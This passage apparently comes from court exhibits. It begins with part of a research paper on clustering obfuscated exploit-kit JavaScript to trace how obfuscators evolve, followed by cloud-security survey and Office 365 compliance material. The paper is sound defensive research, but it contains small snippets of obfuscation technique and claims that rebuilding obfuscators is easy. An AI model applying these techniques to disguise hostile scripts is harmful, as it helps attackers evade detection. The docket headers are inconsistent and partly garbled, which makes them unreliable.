Figure 3 shows the overview of our approach. First we normalize the JavaScript code to abstract away superficial obfuscation and significantly reduce the number of samples with unique code structure. Then we leverage hierarchical clustering model to cluster the samples so that samples in each cluster are generated by the same obfuscator version or variant. We utilize different merge criterions to incorporate sample to cluster when we identify obfuscator version and variant. These criterions are adopted to simulate the evolution of the obfuscator version or variant during clustering. Therefore, the cluster result reflects the evolution of an obfuscator. We demonstrate how our approach works using the exploit kit samples we have collected in the wild. The data we collected from both public blogs/websites [17] and malicious or compromised servers.



Figure 3: Overview of our approach

We defined some terms we used in this paper to describe obfuscator evolution. We define an obfuscator **version** when it changes its template (either EVAL template or Unpack template) and an obfuscator **variant** when it changes its engine logic. The major difference between this two types of obfuscator mutation is the impact on the obfuscated code.

Obfuscator upgrades to a new version normally involves major changes on the obfuscator side (e.g. new encoding mechanism) and it leads to a different unpacker template which at least takes half of the obfuscated page. On the contrary, an obfuscator variant upgrade causes less impact.

### 3.2  JavaScript Normalization

We propose to analyze the structure of the JavaScript code rather than the source code itself. The rationale behind normalization is to abstract away randomized information from the obfuscated source code that are irrelevant to the template of obfuscator. As we explained, the obfuscator engine generates random variable names and garbage data that does not change the syntax of the script (e.g. whitespace, comments).



Figure 4: JavaScript Normalization Example.

In order to filter out the randomized data from the obfuscated script, we propose to normalize the script. We utilize a JavaScript lexer to parse the source code and tokenize it into a sequence of tokens. For each type of token, we map it to one unique character. Then we construct the normalized script by concatenating all of the characters together. As Figure 4 shows, keyword *function* and *return* will be converted to character $F$ and $R$; symbol $I$ represents any variable or identifier regardless of its value; we keep the original content for punctuations (e.g. bracket, comma).

### 3.3  Normalized Samples

**Statistics.** In conducting our analysis, we found out that the number of unique sample is significantly reduced after normalization. Table 1 previews our result. For example, among the 7834 Angler examples we have collected, we only identify 613 unique normalized script. In other words, the rest of them share the identical code structure but with randomized content (e.g. variable names).

| Family | Angler | Nuclear | Rig | KaiXin | Fiesta |
|---|---|---|---|---|---|
| TOTAL # | 7834 | 1303 | 1793 | 10291 | 79 |
| UNIQUE # | 613 | 107 | 344 | 1543 | 48 |

Table 1: Statistics on Normalized Samples

We believe that such massive percentage of identical exploit-kit samples can be leveraged by security researchers. Therefor, we further investigated the duplicated normalized samples. We observed that the majority of them are collected within a short span of time, as described in Figure 6. For example, of the samples from Nuclear family, 91.2 percent of the samples share the same script structure. The chance to find an identical normalized sample off by a day drops to 77.2 percent. For samples collected one week apart, there is only 20 percent chance to find an identical sample.

Case 0:20-cv-60416-XXXX   Document 1-30   Entered on FLSD Docket 02/26/2020   Page 39 of 10 726



(a) Angler version 1          (b) Angler version 3          (c) Nuclear version 5

Figure 5: Pairwise Sample Similarity Distribution Angler Varient



Figure 6: Percentage of Duplicated Normalized Samples within N days sapn

**Similarity.** Due to the heavy obfuscation used by exploit-kits, the similarity score between the source code of two samples is quite low. We have described how to identify scripts with identical code structure using normalization. We can also compare the similarity of the structure of scripts.

Since normalized script reflects the structure of the script, we can leverage sequence or string similarity algorithm to measure the closeness of scripts in term of their structure. We derive a similarity score from *Levenshtein Edit Distance* which stays in interval [0, 1] using the following formula:

$$SimScore(norm1, norm2) = 1 - \frac{EditDist(norm1, norm2)}{max(len(norm1), len(norm2))}$$

## 3.4   Cluster Samples by Their Obfuscator

Due to the lack of knowledge on exploit kit, we are not capable of collecting samples along with obfuscator information. Currently, researchers tend to manually analyze a large amount of samples and identify different variants. This process is time-consuming and not reliable since there is not a clearly rule to define new variants. Leveraging the normalization techniques, we significantly reduces the number of unique samples. Since we only filter out the superficial differences in the scripts (e.g. random variable names), the number of unique normalized samples is still quite large for manual analysis. In order to reverse engineering obfuscators, we need to reduce the number of samples to an affordable level. It requires us to group the samples in such a way that samples in the same group are generated from the same obfuscator variant. We then analyze samples within each group and reverse engineering each obfuscator variant.

**Flat vs Hierarchical.** Obviously, clustering algorithm is our best solution to solve the problem. There are two major types of clustering model: flat and hierarchical. Flat model is simple and efficient, but it has several drawbacks. Algorithms in flat model, such as the most popular one K-Means, require a predefined number $K$ as the input which is the number of clusters. This $K$ can be interpreted as the number of obfuscator version in our case. However, it is hard to predict the number of obfuscator version from the samples and it is actually one of the question we wants to answer in our research.

Therefore, we adopt hierarchical clustering model. Unlike the unstructured result returned by flat model, the result from the hierarchical model conveys the structure information. The result can be visualized as a dendrogram, which is a tree diagram to illustrate the arrangement of the clusters. A predefined threshold can be used to cut the dendrogram into subtrees and the leaves in each subtree is a cluster.

**Threshold.** A dendrogram allows us to adjust the threshold in order to find the best one to identify obfuscator version and variant. We utilize agglomerative (bottom-up) approach to build the dendrogram for each exploit kit family. To measure the threshold, we manually analyzes a couple of samples and marked whether the samples come from the same obfuscator version and obfuscator variants. These samples will be clustered into different places in the dendrogram after we ran the algorithm. We use the marked samples as an anchor to find the proper threshold.

The advantage of hierarchical clustering model model is that we can measure the threshold. The threshold reflects the nature of how an obfuscator evolves, and it is unlikely to be dramatically changed as time goes by (our result spans 2 years). However, the number of new obfuscator versions or variants will definitely increase over time, and we are unable to know it.

Based on our experiment, to identify a new obfuscator **version**, we believe the threshold needs to between **0.4** and **0.5**. Since an obfuscator is designed to conceal the purpose and logic of the code, the obfuscator deliberately make it as different from another at each time the malicious script is generated. The evolution of an obfuscator (e.g. variant with new obfuscation algorithm) happens to lead to the same effect. Although both behaviours could be the explanation of script structure change, we noticed that the latter reason leads to a much significant impact on the changes of

Figure 7: Evolution of Angler Obfuscator Version 1

the script structure. Moreover, obfuscator normally changes a large portion of itself (e.g. adopting new data obfuscation algorithms) to make a new variant. This portion (e.g. unpacker/decoder code) is more than 50% of the malicious script. Therefore, our experiment result is reasonable.

To identify a new obfuscator **variant**, the threshold can be set between **0.8** and **0.9**. Each variant only makes minor change on its previous version when evolving, and most of modification is to upgrade its engine logic. For example, the previous variant (say 1.1) engine utilizes concat-based approach to construct sensitive function name 'eval'(e.g. a='ev'+'al';); and the next variant (say 1.2) engine switch to replace-based approach a='e*al'. replace('*','v');. Comparing the randomization from the obfuscator engine, the variant changes has a litter more impact on the script structure. This is because polymorphism generated by obfuscator engine normally under certain range (e.g. number of unused garbage variable declaration is in a predefined range). On the other hand, minor obfuscation technique upgrade may comes from developer's random thought that are much irregular.

**Within-Cluster Similarity.**  We measure the pairwise similarity score among samples within each cluster. We find out that the majority of samples within each cluster (for obfuscator version) are not similar to each other. Figure 5 depicts the distribution of the pairwise similarity score for samples generated by Angler version 1, Angler version 3 and Nuclear version 7. The horizontal axis represents the similarity score and the vertical axis represents the number of sample pairs has certain similarity score. We choose them because these obfuscator versions last for a relatively longer time and the number of samples we collected for each cluster is large. The majority of the similarity score is in the range from 0.25 to 0.55. A good clustering model pursues high within-clustering similarity and low inter-cluster simi-

larity. It does not mean our hierarchical clustering algorithm is wrong but the feature of the samples.

The evolution of the obfuscator variant leads to such a diverse script structures among the samples generated by the same obfuscator version. Since for certain obfuscator version, it evolves its obfuscator engine logic to perform polymorphism. The evolution of obfuscator variant are irregular. Due to the dynamic feature of JavaScript, attackers can easily make a new variant with an arbitrary. We monitor the samples generated by the Angler obfuscator version 1 which is active from 2014 to 2016. This obfuscator version keeps evolving, and so far it has 11 variants. We observe that each of the variant utilizes different obfuscation implementations to construct the sensitive API name *fromCharCode*, which is a key method of String object to unpack payload. Figure 7 shows the evolution of obfuscator variants in term of their way to construct string *fromCharCode*.

The *fromCharCode* example and our within-cluster statistics imply a fact that, with the obfuscation variant evolution, the samples changes dramatically. It is possible that samples with similarity score less than 0.2 can be grouped into same cluster. It means security researchers has to keep track of all of the variants in order to name a new version or variant correctly. If they miss the samples for a period of time, even for a week, they may name a new variant which should be an continuation of existing variant. However, our approach can solve this problem.

**Life Cycle of Obfuscator Version and Variant.**  Although the main purpose of our approach is to reproduce obfuscator, it can also be used to identify the life cycle of obfuscators. Since prior reports always leverage the browser/plugin vulnerability targeted by the payload to identify exploit kit changes, we will show the mutation of exploit kit from the evolution of its obfuscator. We use threshold **0.43** to identify obfuscator version and use threshold **0.81** to identify

obfuscator variant. We applied our approach on the sample we collected in real-world and draw a timeline to show the life cycle of each obfuscator.

Figure 8 depicts the timeline of obfuscator version for 5 exploit kit families from 2014 to 2016, and Figure 9 illustrates the timeline of obfuscator variant. Each line in both figures represents an individual obfuscator version, and each block in Figure 9 represents an obfuscator variant.

Different exploit kit family has a diverse life cycle of their obfuscators. Nuclear exploit-kit has constantly evolved from 2009. The life cycle of its obfuscator version has an unique pattern, non-overlapping. It means one obfuscator version died right after a new version get deployed to the server. Obfuscators in the rest of the exploit kit families all has multiple version active in parallel. It is not common that multiple obfuscator variant running at the same time, but we do detect that it is the case for KaiXin exploit kit obfuscator version 1. Angler exploit-kit is the most popular and complicated exploit kit. But it actually has less number of obfuscator version and variant (Figure 9a). Couple of obfuscator versions are active at the same time, especially during the forth quarter of 2015 we collected samples from 4 obfuscator versions. This is may be one of the reasons that people believe it is complex.

Another interesting observation is that, our result matches the fact how exploit kit evolved. According to the report from website WebSense [18], nuclear pack completely replace the older version to a new version at December 2014. And our timeline reflect that the obfuscator also upgraded to a new version.

### 3.5 Rebuild Obfuscator

Leveraging our clustering algorithm, we cluster samples that generated by a same obfuscator variant into a group. Since the number of unique normalized samples in each group is quite small. By comparing the common structure of the samples in the same group, we can easily rebuild the template used by the obfuscator. For the variable or string whose name or value is randomly mutated, they are server-side variable in the template (e.g. $var p[11]$). Otherwise, it is the fixed content in the template (e.g. '.length > 0)'). The last step is to rebuild the obfuscator logic. It is not hard to reverse engineering the decoding mechanism and implement an encoder. All of these can be easily done since our algorithm cluster the number of samples to an affordable level (average around 15 samples and extremely similar).

## 4. EVALUATION

We evaluate our cluster result in two ways. Due to the lack of information related evolution of obfuscator, we cannot exactly measure our result. Alternatively, we give the timeline of obfuscator version/variant to the security researchers in our company who focus on exploit kit coverage for several years. Based on their expert knowledge, they believe that is how the obfuscator evolved. We also manually analyzed 50 samples and marked the ones from the same obfuscator version and variant. We checked them in the overall clustering result, and found out that only 2 of them are misplaced.

## 5. RELATED WORK

**Generic Malicious JavaScript Detection**   ADSandbox [19] proposes to execute suspicious JavaScript in a controlled environment (sandbox). It modified SpiderMonkey, Mozilla's JavaScript engine, to monitor the behavior of JavaScript programs during the runtime. More specifically, ADSandbox intercepts access to every JavaScript object at each time and log it. By applying predefined heuristics (e.g. regular expressions for pattern match) on the resulting logs, the system can detect malicious behaviors.

Zozzle [3] is a static JavaScript malware detector that is fast enough to be used in a browser. Zozzle utilized the browser to extract features from JavaScript AST for both benign and malicious training set. It applied machine learning approach to build the Bayesian classifier model. One of the shortcoming of Zozzle is that it highly depends on the feature robustness of the knowledge model. For the exploit kit scenario,

**Environment Detection in Malicious JavaScript**   Malicious script will try to fingerprint the browser and OS environment, and it will launch the attack only if the environment is vulnerable (e.g. launch attack on IE vulnerability only if the browser is IE with specific version). If the environment is not matched, malware will run the benign code instead. Rozzle [20] focuses on using Symbolic Execution as a way to explore multi-path execution to improve both static and runtime JavaScript detection.

**Obfuscation Detection**   The paper, Caffeine Monkey [21], executes suspicious JavaScript code in a sandbox and recorded the count of each function calls. It marks the script as malicious If the percentage of specific function calls is above a predefined threshold. This paper is the first one to formally address the problem of obfuscation.

Likarsh etc. [2] propose to apply machine learning to the features of obfuscated malicious JavaScript. They extract 65 features in this paper, which include keywords and symbols from static and dynamic analysis. They also apply multiple models to do the classification.

Lu and Debray [22] propose to automatically de-obfuscate JavaScript code, generate the simplified version of it but preserve the semantic as well. They utilize the dynamic slicing algorithm to mark instructions that are relevant to the malware logic.

## 6. ACKNOWLEDGMENTS

We would like to thank *Xin Ouyang* and *Wei Xu* of Palo Alto Networks Inc for their support on this project and *Rongbo Shao* of Palo Alto Networks Inc for collecting exploit kit samples.

## 7. REFERENCES

[1] De Maio, G., Kapravelos, A., Shoshitaishvili, Y., Kruegel, C., and Vigna, G., 2014. "Pexy: The other side of exploit kits". In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, Springer, pp. 132–151.

[2] Likarish, P., Jung, E., and Jo, I., 2009. "Obfuscated malicious javascript detection using classification techniques.". In MALWARE, Citeseer, pp. 47–54.

[3] Curtsinger, C., Livshits, B., Zorn, B. G., and Seifert, C., 2011. "Zozzle: Fast and precise in-browser javascript malware detection.". In USENIX Security Symposium, pp. 33–48.



Figure 8: Life-Cycle of Exploit Kit Obfuscator version

[4] Xu, W., Zhang, F., and Zhu, S., 2013. "Jstill: mostly static detection of obfuscated malicious javascript code". In Proceedings of the third ACM conference on Data and application security and privacy, ACM, pp. 117–128.

[5] Cova, M., Kruegel, C., and Vigna, G., 2010. "Detection and analysis of drive-by-download attacks and malicious javascript code". In Proceedings of the 19th international conference on World wide web, ACM, pp. 281–290.

[6] Tzermias, Z., Sykiotakis, G., Polychronakis, M., and Markatos, E. P., 2011. "Combining static and dynamic

analysis for the detection of malicious documents". In Proceedings of the Fourth European Workshop on System Security, ACM, p. 4.

[7] Canali, D., Cova, M., Vigna, G., and Kruegel, C., 2011. "Prophiler: a fast filter for the large-scale detection of malicious web pages". In Proceedings of the 20th international conference on World wide web, ACM, pp. 197–206.

[8] Kapravelos, A., Shoshitaishvili, Y., Cova, M., Kruegel, C., and Vigna, G., 2013. "Revolver: An automated approach to the detection of evasive web-based malware". In Presented as part of the 22nd USENIX

Case 0:20-cv-60416-XXXX   Document 1-30   Entered on FLSD Docket 02/26/2020   Page 401 of
726
Case 0:20-cv-60416-XXXX   Document 1-30   Entered on FLSD Docket 02/26/2020   Page 9 of 10



Figure 9: Life-cycle of Minor version of Obfuscator variants

Security Symposium (USENIX Security 13), pp. 637–652.

[9] Stock, B., Livshits, B., and Zorn, B., 2015. "Kizzle: A signature compiler for exploit kits". In International Conference on Dependable Systems and Networks.

[10] Taylor, T., Hu, X., Wang, T., Jang, J., Stoecklin, M. P., Monrose, F., and Sailer, R., 2016. "Detecting malicious exploit kits using tree-based similarity searches". In Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy, ACM, pp. 255–266.

[11] Jones, J., 2012. "The state of web exploit kits".

[12] Oliver, J., Cheng, S., Manly, L., Zhu, J., Dela Paz, R., Sioting, S., and Leopando, J., 2012. "Blackhole exploit kit: A spam campaign, not a series of individual spam runs". *Trend Micro Incorporated Research Paper*, pp. 1–19.

[13] Howard, F., 2012. "Exploring the blackhole exploit kit". *Sophos White Paper*.

[14] Xu, W., Zhang, F., and Zhu, S., 2012. "The power of obfuscation techniques in malicious javascript code: A measurement study". In Malicious and Unwanted Software (MALWARE), 2012 7th International Conference on, IEEE, pp. 9–16.

[15] Blog, W. S. L., 2016. Happy nucl(y)ear - evolution of an exploit kit. http://blog.checkpoint.com/wp-content/uploads/2016/04/Inside-Nuclear-1-2.pdf .

[16] Research, S., 2015. Rig exploit kit - diving deeper into the infrastructure. https://www.trustwave.com/Resources /SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93 -Diving-Deeper-into-the-Infrastructure/ .

[17] Duncan, B. Malware traffic analysis. www.malware-traffic-analysis.net.

[18] Research, C. P. T. I. ., 2016. Inside nuclear's core: Analyzing the nuclear exploit kit infrastructure. http://community.websense.com/blogs/securitylabs/ archive/2015/01/15/evolution-of-an-exploit-kit -nuclear-pack.aspx .

[19] Dewald, A., Holz, T., and Freiling, F. C., 2010. "Adsandbox: Sandboxing javascript to fight malicious websites". In Proceedings of the 2010 ACM Symposium on Applied Computing, ACM, pp. 1859–1864.

[20] Kolbitsch, C., Livshits, B., Zorn, B., and Seifert, C., 2012. "Rozzle: De-cloaking internet malware". In 2012 IEEE Symposium on Security and Privacy, IEEE, pp. 443–457.

[21] Feinstein, B., Peck, D., and SecureWorks, I., 2007. "Caffeine monkey: Automated collection, detection and analysis of malicious javascript". *Black Hat USA*.

[22] Lu, G., and Debray, S., 2012. "Automatic simplification of obfuscated javascript code: A semantics-based approach". In Software Security and Reliability (SERE), 2012 IEEE Sixth International Conference on, IEEE, pp. 31–40.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 403 of 726

# EXHIBIT 29

idg.com

# Cloud Computing Survey 2015 · IDG

2-3 minutes

Tech Research |



Today, 72% of organizations have at least one application in the cloud or a portion of their computing infrastructure in the cloud, and they are not stopping there. As 56% of technology decision-makers are still investigating where cloud use can be leveraged, it is important to understand usage plans across various cloud service models, investments and business drivers. The 2015 IDG Enterprise Cloud Computing study deeply measures all of these areas and ultimately explains the impact cloud computing has on business strategy.

Key Findings include:

- Cloud investments continue to rise and enterprise organizations are investing significantly more than SMBs.
- Cloud computing investments continue to be driven by lower total cost of ownership, enablement of business continuity and speed of deployment.
- Traditional "as-a-service" models remain significant, and there's movement towards Storage-as-a-Service, Monitoring-as-a-Service and Disaster-Recovery as-a-Service.
- Sensitivity of data and importance to business determine which applications are migrating to the cloud.
- Security remains the top adoption challenge, with over half of organizations saying that vendors must ensure security measures can meet their compliance requirements.
- Organizations have strong relationships with cloud vendors, but vendor support is still needed to fully embrace cloud solutions.

IDG Enterprise's 2015 Cloud Computing Survey was conducted online among the audiences of IDG Enterprise brands (CIO, Computerworld, CSO, InfoWorld, ITworld and Network World). Results are based on 962 qualified respondents.

Want to know more about cloud computing? View our infographic.

For more information on this study, view the excerpt below. To request a meeting with an IDG Enterprise sales executive to walk through the full study, please complete the form below.

Case 0:20-cv-60416-AMC   Document 1-1 Entered on FLSD Docket 02/26/2020 Page 405 of

# EXHIBIT 30

# What's behind the growing confidence in cloud security

Security concerns have traditionally **ranked** among the top inhibitors of cloud adoption. But in a striking reversal, security has now become a key reason businesses choose cloud solutions, according to a global survey of more than 500 IT decision-makers conducted on behalf of Google Cloud in association with MIT SMR Custom Studio. Three out of four respondents said their confidence in the security of cloud applications and infrastructure has grown over the last two years, while only 1 percent reported decreased confidence.

What's behind companies' newfound belief that the cloud is just as secure as — or more secure than — on-premises systems? The survey suggests that the proof is in the pudding: Two-thirds of respondents attributed their rising confidence in cloud security to positive firsthand experiences with it. The more business and IT leaders use the cloud, in other words, the more they trust it with their most important data. Half of participants said their confidence grew after a detailed audit or examination comparing cloud and on-premises security. These assessments highlighted cloud providers' advanced security tools and support for security and compliance standards, in addition to other benefits, respondents said.

Due in part to this uptick in confidence, use of cloud expanded from 24 percent of workloads in 2015 to 44 percent in 2017, and it's expected to reach 65 percent in 2019, the survey found. Respondents also connected this trend to two more traditional drivers of cloud adoption: increased need for agility and speed and cost savings. Top current and future use cases for the cloud include data storage, collaboration and productivity, application development, and IoT, while machine learning and artificial intelligence are the fastest-growing applications.

With many businesses ramping up their reliance on cloud computing, pockets of doubt remain, the research reveals. Among cloud skeptics who participated in the survey, forty-one percent cited security concerns as a barrier to cloud deployment.

Notably, business decision-makers were more likely to lack confidence in cloud security than IT respondents, and senior executives at large companies had the most apprehension. Lack of visibility into cloud security controls may be a reason for these lingering fears, especially among those accustomed to running their own in-house infrastructure, according to an expert quoted in the report.

In spite of this skepticism, the study make a strong case that the tide is turning when it comes to perceptions of cloud security. Google Cloud Marketing Lead for Trust and Security Rob Sadowski acknowledges this fact in an introduction to the report, writing, "It's gratifying to see IT leaders recognizing that, in many cases, moving to the cloud can actually enhance security." But he also reminds technology decision-makers that security capabilities vary from one vendor or implementation model to another, making it essential to ensure that potential cloud partners can meet business-specific security requirements.

To find out more, **access the complete report** by MIT SMR Custom Studio, entitled "Behind the Growing Confidence in Cloud Security."

---

# Keep Building

| | | |
|---|---|---|
| ≣ ARTICLE    ⏱ 8 MIN READ    ⤳ | ≣ ARTICLE    ⏱ 9 MIN READ    ⤳ | ≣ LIST    ⏱ 4 MIN READ    ⤳ |
| **The cloud is not what you think** | **Public cloud pricing, explained** | **Is your vendor truly open? Here's how to find out.** |
| Sure, cloud computing can cut costs and boost efficiency, but that's not all. It's changing business as we know it. See why it's time to reframe our thoughts on cloud. | Does cloud pricing make your head spin? Learn the basics so you can find a great deal for your business. See how public cloud providers calculate their costs, make sure you're asking all the right questions, and learn ways to save. | 1  Have they open-sourced any software? <br> 2  Do they contribute to open-source projects? <br> 3  Are their internal tools compatible with the external versions? |

Case 0:20-cv-60416-AMC Document 2-1 Entered on FLSD Docket 02/26/2020 Page 407 of

# EXHIBIT 31



# Organizational Security & Compliance Practices in Office 365

Research conducted by CollabTalk LLC and the BYU Marriott School

Commissioned by Spanning, RecordPoint, tyGraph, Rencore, and Microsoft

Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 409 of 726

# Table of Contents

Introduction ........................................................................................................... 2

   Methodology ..................................................................................................... 2

   Demographics .................................................................................................... 3

Insights and Definitions ......................................................................................... 8

   Industry Perspectives ....................................................................................... 9

      Public Sector ................................................................................................. 9

      Education Sector ......................................................................................... 10

      Financial Services Sector ............................................................................ 10

      Healthcare Sector ....................................................................................... 11

The Maturity of Office 365 Security and Compliance Standards ................................. 12

   Security Concerns ........................................................................................... 13

   Addressing Compliance Concerns .................................................................... 17

      Data Loss Prevention (DLP) ........................................................................ 18

      eDiscovery in the Security & Compliance Center ........................................ 18

      Archiving in Office 365 ............................................................................... 18

      Continuous Compliance Services ................................................................ 18

      International Compliance Standards and Certifications ................................. 19

   The Ownership Dilemma ................................................................................. 21

   The Confidence Gap ........................................................................................ 22

Overall Analysis and Recommendations ................................................................. 32

Advisory Panel ...................................................................................................... 36

Sponsors ............................................................................................................... 37

ABOUT COLLABTALK

CollabTalk LLC is an independent research and technical marketing services company, founded with the goal of empowering customers to create and manage effective and engaging content and marketing strategies. CollabTalk focuses on tools and trends in the enterprise collaboration, social, and business intelligence ecosystems, and provides community-driven events, original research, and thought-leadership content.
For more information, visit https://collabtalk.com.

© 2019, CollabTalk LLC. All rights reserved. Unauthorized reproduction is strictly prohibited. Information is based on original research and best available resources. Opinions reflect judgement at the time and are subject to change. All images licensed through 123RF.com. All trademarks are the property of their respective companies.

CollabTalk

# Introduction

The number one area of concern identified by customers as they began planning for their move to the cloud is security and compliance. Cloud security and compliance is an increasingly important topic for all industries as increasing cost efficiencies drive organizations towards the cloud. "End-user spending for the information security market is estimated to grow at a compound annual growth rate of 8.5% from 2017 through 2022 to reach $170 billion in constant currency."[1]

Looking at the Office 365 platform, with the core workloads of Exchange, SharePoint, OneDrive, and Skype, they include decades of on-premises history with robust and mature security, compliance and governance capabilities as standalone offerings. Customers around the world have relied on the on-premises versions of Exchange, SharePoint, OneDrive, and Skype, and are now deciding whether to adopt them as online services via the Office 365 platform. While the Office 365 platform inherits the robust and mature security, compliance and governance capabilities of its on-premises standalone predecessors, customers need to include a review their security, governance and compliance requirements as they migrate to Office 365 to ensure that requirements are being met and any gaps can be managed.

This research focuses on how organizations have evolved (or not evolved) their governance planning and activities as they've moved from on-premises environments to the cloud (primarily Office 365), and seeks to provide CIOs, IT management, and security and compliance officers with a better understanding of the impacts of not evolving.

## Methodology

For this research project, CollabTalk partnered with the Marriott School of Business at Brigham Young University to conduct primary research that included surveys, interviews with customers, partners and Microsoft Most Valuable Professionals (MVP's), and secondary research of academic and industry research and content to answer key questions surrounding the level of governance awareness and readiness from a cross-section of Office 365 customers around the world.

The goal of this research is to examine how organizations are managing security and compliance today, looking specifically at the evolving patterns of end user and team collaboration, and identifying the changing workplace habits that are impacting costs and risks due to security and compliance gaps in the business processes and technologies used. While the primary focus of this research will be on SharePoint customers, which is where most governance activities are generally managed, the research will look at the broader enterprise collaboration story, encompassing Office 365, Windows, and mobility.

Some of the questions we plan to address:

- How do IT organizations assess and tackle security and compliance problems?
- What is the "business view" of security and compliance?
- How do viewpoints of security and compliance change between industries?
- What are the common workplace scenarios that are undergoing change, and what is the cost/impact of these changes (or lack of change)?
- How much is the work that we do changing due to these standards?
- What industry trends are important to consider?
- Where does security and compliance with Office 365 need to be improved?

Overall, our findings reveal that security and compliance is a topic that is highly misunderstood. Most organizations believe that security is an area of continuous improvement but see compliance as adherence

---

[1] https://www.gartner.com/doc/3883783/forecast-information-security-worldwide-

 CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-13   Entered on FLSD Docket 02/26/2020   Page 411 of 726

to standardized laws. Both security and compliance are aspects of corporate risk management, and security is more prioritized because the effects of security failings are costlier than the effects of compliance failings.

## Demographics

In order to answer key questions, the research team conducted a detailed survey with IT professionals, c-level executives, and compliance officers globally. The data represents 195 responses across 19 industries. Additionally, pulse surveys were conducted in APAC and the EU, asking fewer but more granular questions about their security and compliance activities and confidence in Office 365 capabilities, providing the research team with another 76 responses and additional perspectives. The companies represented range from under 50 employees to more than 10,000 employees, running environments that range from legacy hardware to cloud and hybrid.

Respondents were surveyed as representing their own companies, or for consultants, their current clients rather than an aggregate of past clients. The following figures are provided as a demographic overview of the survey respondents:



*Figure 1 - Company size of survey respondents*

The global cloud security market size was valued at USD 4.88 billion in 2016. It is expected to rise at a compound annual growth rate (CAGR) of 13.9 percent until 2024. Cloud computing security, also known as cloud security, incorporates all plans, policies, and their execution controls essential to safeguard and protect application data, infrastructure as well as compliance adherence associated with cloud. (Research, n.d.)

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 4 of 39



*Figure 2 - US cloud security market size, by application, 2014-2024 (USD Million)*

IT and Telecom and Financial Services are the two largest application segments in the market. They are likely to remain prominent throughout the forecast period. There is expected to be an exponential increase in spending on cloud services across industries. From a report, it is expected to reach $160 billion by the end of 2018, an increase of 23.2 percent from 2017 and reach $227 billion by 2021. (Zola, n.d.)

Survey respondents came from a variety of industries, although "Technology" is a broad category that consists of Information Technology and services, consulting, and cloud-based solutions and providers.

*Table 1 - Industries represented by survey respondents*

| Answer | % |
|---|---|
| Healthcare | 2.74% |
| Finance or Insurance | 6.16% |
| Public Sector or Government | 29.45% |
| Resource Industries (Oil & Gas, Mining, Utilities) | 6.85% |
| Education | 6.16% |
| Entertainment and Recreation | 0.68% |
| Manufacturing | 2.74% |
| Technology | 26.71% |
| Retail | 1.37% |
| NGO | 2.74% |
| Services | 6.16% |
| Non-profit | 2.74% |
| Other | 5.48% |

Rather than ask survey respondents to identify the versions of platforms and tools used, since the primary scope for this research was Office 365, we asked respondents to identify the state of their move to the cloud, providing more granularity to their responses, as shown in Table 2 - *Environments in use from survey respondents* below. Based on this, the top three environments identified by respondents were:

CollabTalk

1. Hybrid solutions (combination of Office 365 and on-prem components) (22.99%)
2. Other public cloud solutions such as Box, Dropbox, G Suite (17.24%)
3. Cloud-based CRM such as Salesforce, Microsoft Dynamics Online (14.18%)

What this helps illustrate is that customers that maintain a single OEM vendor relationship (for example, only using the Microsoft technology stack) are no longer typical. Furthermore, the majority of environments are currently leveraging or are planning to move to hybrid scenarios[2]. Due to multi-vendor and hybrid complexity, organizations need to understand their security and compliance requirements beyond the out-of-the-box capabilities supported by individual workloads.

On the topic of multi-vendor usage, some of our research advisory panel were surprised by some of the data points. For example, Jussi Roine (@JussiRoine), Chief Research Officer at Sulava Oy in Helsinki, Finland and a Microsoft Regional Director and MVP commented:

> *"Very surprised to see "other public cloud solutions such as Box, Dropbox, G Suite" so high. It's expected but still, it's surprising especially for companies that are already using Office 365."*

Less surprising, however, was the hybrid data. As stated by Eric Overfield (@EricOverfield), President of PixelMill in Davis, California, and a Microsoft Regional Director and MVP:

> *"On-prem is not going anywhere soon, over 60% are utilizing hybrid solutions."*

*Table 2 - Environments in use from survey respondents*

| Answer | % |
|---|---|
| On-premises Microsoft solutions only | 6.13% |
| Office 365 only | 9.20% |
| Hybrid solutions (combination of Office 365 and on-prem components) | 22.99% |
| Other dedicated cloud solutions, such as Rackspace or other private hosters | 13.41% |
| Other public cloud solutions such as Box, Dropbox, G Suite | 17.24% |
| Legacy Enterprise Content Management platforms such as Documentum, FileNet, HP TRIM | 11.11% |
| Microsoft Cloud for Government for U.S. Federal, State, and Local Government | 2.68% |
| Cloud-based CRM such as Salesforce, Microsoft Dynamics Online | 14.18% |
| Other | 3.07% |

As *Table 3* shows, the vast majority of survey respondents are using the Office 365 Enterprise (E Plans) licensing, which is where Microsoft and partners have been directing customers as they provide the most comprehensive set of features and solutions.

---

[2] CollabTalk, 2017. "Understanding the State of Hybrid SharePoint Ecosystem"



Case 0:20-cv-60416-XXXC   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 4 of 39

*Table 3 - Office 365 licensing from survey respondents*

| Answer | % |
|---|---|
| Office 365 Small Business (P Plans) | 4.71% |
| Office 365 Midsize Business (M Plans) | 3.53% |
| Office 365 Enterprise (E Plans) | 78.82% |
| Office 365 Kiosk (K Plans) | 7.06% |
| Other | 5.88% |

With our focus on security and compliance, it was expected that a sizeable percentage of respondents would consist of compliance and records management personnel (24%), executives (13%) and senior managers (11%), and consultants (11%), together comprising two-thirds of all respondents and interview participants.

*Table 4 - Roles of survey respondents*

| Answer | % |
|---|---|
| Senior Leadership/Executive | 13.33% |
| Director/Senior Manager | 11.33% |
| IT Manager | 9.33% |
| Compliance Officer / Legal / Records Manager | 24.00% |
| Team Lead | 8.00% |
| Engineer/Developer | 3.33% |
| Project/Product Manager | 6.67% |
| Consultant | 11.33% |
| Information Worker | 7.33% |
| Other | 5.33% |

Commenting on the role of upper management, Nicki Borell (@NickiBorell), a Microsoft Regional Director and MVP, and co-founder of Experts Inside commented:

> Security and Compliance topics are still not under the focus of top-level management. They know about it, and they know they should take care of it, but they don't really engage in it. The solution is to be honest, show upper management the data breach examples, and talk about the story behind these topics.

Another interesting data pivot point is shown in Figure 3, which allowed the research team to explore survey responses based on primary workload, as well as by role, company size, and other demographic details. Where this comes into play later within this research is around confidence levels in specific Office 365 security and compliance capabilities, and whether these workloads are perceived as "high" or "low"

CollabTalk

Case 0:20-cv-60416-XXXX   Document 1-33   Entered on FLSD Docket 02/26/2020   Page 415 of 726

risk against organizational requirements. Several of the research advisory panel were surprised by some of the responses within our sample size.

